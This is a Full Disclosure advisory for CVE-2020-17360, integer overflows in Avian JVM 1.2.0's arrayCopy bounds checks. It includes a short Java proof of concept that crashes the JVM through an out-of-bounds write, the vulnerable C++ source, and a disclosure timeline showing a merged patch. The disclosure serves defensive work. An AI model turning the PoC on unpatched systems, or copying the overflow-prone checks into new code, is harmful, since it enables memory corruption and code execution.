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[FD] Avian JVM vm::arrayCopy() Multiple Integer Overflows

Vulnerability title: Avian JVM vm::arrayCopy() Multiple Integer Overflows
Author: Pietro Oliva
CVE: CVE-2020-17360
Vendor: ReadyTalk
Product: Avian JVM 
Affected version: 1.2.0

The issue is located in the vm::arrayCopy method defined in classpath-common.h,
where multiple boundary checks are performed to prevent out-of-bounds memory
read/write. Two of those boundary checks contain an integer overflow which leads
to those same checks being bypassed and out-of-bounds read/write.   

Attackers could exploit this vulnerability to read/write arbitrary content in
the JVM memory. This could in turn result in denial of service, memory 
disclosure, or arbitrary code execution in the context of the JVM.

The following PoC would trigger an out-of-bounds write and crash of Avian JVM:

import java.lang.*;

public class poc {

    public static void main(String[] args) {
        byte[] src = "This is src".getBytes();
        byte[] dst = "This is dst".getBytes();

        // Triggering out-of-bounds write via integer overflow on 
        System.arraycopy(src, 0, dst, 0x7fffffff, 1);


void arrayCopy(Thread* t,
               object src,
               int32_t srcOffset,
               object dst,
               int32_t dstOffset,
               int32_t length)
  if (LIKELY(src and dst)) {
    if (LIKELY(compatibleArrayTypes(
            t, objectClass(t, src), objectClass(t, dst)))) {
      unsigned elementSize = objectClass(t, src)->arrayElementSize();

      if (LIKELY(elementSize)) {
        intptr_t sl = fieldAtOffset<uintptr_t>(src, BytesPerWord);
        intptr_t dl = fieldAtOffset<uintptr_t>(dst, BytesPerWord);
        if (LIKELY(length > 0)) {
          if (LIKELY(srcOffset >= 0 and srcOffset + length <= sl // integer OF
/*integer overflow*/ and dstOffset >= 0 and dstOffset + length <= dl)) {
            uint8_t* sbody = &fieldAtOffset<uint8_t>(src, ArrayBody);
            uint8_t* dbody = &fieldAtOffset<uint8_t>(dst, ArrayBody);
            if (src == dst) {
              memmove(dbody + (dstOffset * elementSize),
                      sbody + (srcOffset * elementSize),
                      length * elementSize);
            } else {
              memcpy(dbody + (dstOffset * elementSize),
                     sbody + (srcOffset * elementSize),
                     length * elementSize);

            if (objectClass(t, dst)->objectMask()) {
              mark(t, dst, ArrayBody + (dstOffset * BytesPerWord), length);

          } else {
            throwNew(t, GcIndexOutOfBoundsException::Type);
        } else {
  } else {
    throwNew(t, GcNullPointerException::Type);

  throwNew(t, GcArrayStoreException::Type);

As can be seen in the two lines commented above, offset+length can overflow and
the size checks would be bypassed. Overflowing srcOffset+length would trigger an
out-of-bounds read in either memmove or memcpy, while overflowing dstOffset + 
length would trigger an out-of-bounds write in the same methods.

Mitigating factors:
Since both offsets and length need to be positive integers, there is a limited
range of memory where an attacker could read or write as a result of this

A patch has been merged in the master branch:

Disclosure timeline:
3rd August 2020  -  Vulnerability reported.
3rd August 2020  -  Vulnerability acknowledged.
4th August 2020  -  CVE request sent to Mitre.
5th August 2020  -  CVE assigned.
10th August 2020 -  Proposed patch via pull request.
10th August 2020 -  Patch approved and merged after changes.
10th August 2020 -  Vulnerability details shared on fulldisclosure.

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